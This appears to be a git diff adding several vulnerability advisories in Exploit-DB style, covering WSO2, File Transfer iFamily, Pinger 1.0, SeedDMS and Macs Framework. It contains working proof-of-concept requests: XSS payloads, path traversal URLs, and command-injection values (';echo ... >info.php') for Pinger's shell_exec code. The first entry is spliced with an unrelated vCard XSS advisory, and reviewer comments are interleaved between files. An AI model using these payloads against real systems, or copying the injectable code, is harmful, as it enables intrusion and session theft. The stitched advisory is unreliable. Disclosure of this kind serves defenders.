@@ -0,0 +1,142 @@ +# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting +# Date: 2020-04-13 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A +# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 + +Technical Details & Description: +================================ +A remote Stored Cross Site Scripting has been discovered in WSO2 API +Manager Ressource Browser component). +The security vulnerability allows a remote attacker With access to the +component "Ressource Browser" +to inject a malicious code in Add Comment Feature. + +The vulnerability is triggered after sending a POST request to +`/carbon/info/comment-ajaxprocessor.jsp` with Parameter +"comment=targeted&path=%2F". +Remote attackers has the ablility to spread a malware,to Hijack a session +(a session with Higher privileges), or to initiate phishing attacks. + +The security risk of the Stored XSS web vulnerability is estimated as +medium with a cvss (common vulnerability scoring system) count of 5.4 +Exploitation of the Stored XSS web vulnerability requires a low privilege +web-application user account and medium or high user interaction. +Successful exploitation of the vulnerability results in Compromising the +server . 
+ + +Request Method: +[+] POST + +Module: +[+] /carbon/info/comment-ajaxprocessor.jsp + +Parameters: +[+] comment=admincomment +[+] path=%2F +======================================= + +POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 +Host: 192.168.149.1:9443 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH +Content-Length: 64 +Cookie: region3_registry_menu=visible; region3_metadata_menu=none; +wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; +JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; +requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; +region4_monitor_menu=none; region5_tools_menu=none; +current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 +Connection: close + +comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F + + + + + +============================== + + + +HTTP/1.1 200 + +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +vary: accept-encoding +Content-Type: text/html;charset=UTF-8 +Content-Language: en-US +Date: Tue, 31 Dec 2019 10:50:00 GMT +Connection: close +Server: WSO2 Carbon Server +Content-Length: 3144 + + +//the body of response includes attacker malicious script + + +  + + + + + +PoC: Vulnerable Source (Listing - Index) + + +

Contacts 09:17:12:PM 10:Apr.:2020 .vcf

+ +

26.40 KB

+ + + + + + + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >" +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 +PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>" ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>".vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. 
Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt 
@@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. 
+ + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. 
+ + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. 
Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt new file mode 100644 index 000000000..e6038c894 --- /dev/null +++ b/exploits/php/webapps/48323.txt 
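Review bot: The `# Software Link:` header at the top of exploits/ios/webapps/48327.txt points to http://www.dedecms.com/products/dedecms/downloads/, a DedeCMS download page that has nothing to do with File Transfer iFamily; the body's "Copy of the Homepage" line gives the App Store URL for the product actually described. Suggest replacing the header with `# Software Link: https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575` so readers triaging this entry are not sent to the wrong vendor. The header `# Date: 2020-04-15` also differs from the body's `Release Date: 2020-04-14`; one of the two is presumably a slip and the pair should agree.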
@@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '' >info.php +http://localhost/pinger/ping.php?socket=;echo '' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' 
| grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt 
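Review bot: exploits/php/webapps/48323.txt quotes the vulnerable source, where `$_GET['ping']` and `$_GET['socket']` are concatenated straight into `shell_exec()`, but unlike the other advisories in this commit (48324, 48325, 48327) it has no "Solution - Fix & Patch" section. A one-paragraph remediation would help defenders reading the entry: pass the ping target through `escapeshellarg()`, and for the socket case split host and port and validate each against a strict hostname/IP pattern and a numeric range before building the command, since `escapeshellarg()` on the combined "host port" string would not yield a usable nc invocation. Separately, the header block (Vendor Homepage, Software Link, Date, Author, Tested on, Version, CVE) appears twice with the date in two formats (`2020-04-13` and `2020.04.13`); keeping a single copy avoids that drift, and `# Vulnerabile code:` should read `# Vulnerable code:`.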
@@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. 
+ + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. 
+ +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! + + +PoC: Vulnerable Source (Log Management - View) +
Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
+ + +PoC: Payload +>" + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"&comment=>" +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, 
deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php +https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. 
Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. 
+ +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt 
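Review bot: The affected-version information in exploits/php/webapps/48324.txt is inconsistent across sections: the title says 5.1.18, the abstract says "v5.1.16 & v5.1.18", Affected Product(s) lists v4.3.37, v5.0.13, v5.1.14, v5.1.16, v5.1.18 and v6.0.7, and Technical Details names "v4.3.37, v5.0.13, v5.1.14 and v6.0.7" with 5.1.16/5.1.18 missing. Someone using this entry to decide whether a deployment is affected needs one authoritative list, so the Technical Details sentence should be aligned with the Affected Product(s) block. The PoC session logs also repeat a session cookie value (`mydms_session=...`) in every request; redacting such values is common advisory practice and loses nothing for reproduction.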
@@ -0,0 +1,482 @@
+# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
+# CVE: N/A
+
+Document Title:
+===============
+Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2206
+
+
+Release Date:
+=============
+2020-04-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2206
+
+
+Common Vulnerability Scoring System:
+====================================
+7.4
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
+System. It focuses mainly on the
+Edit In Place editing concept. It comes with a built in blog with
+moderation support, user manager section,
+roles manager section, SEO / SEF URL.
+https://sourceforge.net/projects/macs-framework/files/latest/download
+
+(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple web
+vulnerabilities in the official Macs Framework v1.1.4f CMS.
+
+
+Affected Product(s):
+====================
+Macrob7
+Product: Macs Framework v1.14f - Content Management System
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-14: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1 & 1.2
+Multiple non-persistent cross site scripting web vulnerabilities has
+been discovered in the official Mac Framework v1.1.4f Content Managament
+System.
+The vulnerability allows remote attackers to manipulate client-side
+browser to web-applicatio requests to compromise user sesson credentials
+or to
+manipulate module content.
+
+The first vulnerability is located in the search input field of the
+search module. Remote attackers are able to inject own malicious script
+code as
+search entry to execute the code within the results page that is loaded
+shortly after the request is performed. The request method to inject is
+POST
+and the attack vector is located on the client-side with non-persistent
+attack vector.
+
+The second vulnerability is located in the email input field of the
+account reset function. Remote attackers are able to inject own
+malicious script code as
+email to reset the passwort to execute the code within performed
+request. The request method to inject is POST and the attack vector is
+located on the
+client-side with non-persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent external
+redirects to
+malicious source and non-persistent manipulation of affected or
+connected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Parameter(s):
+[+] searchString
+[+] emailAdress
+
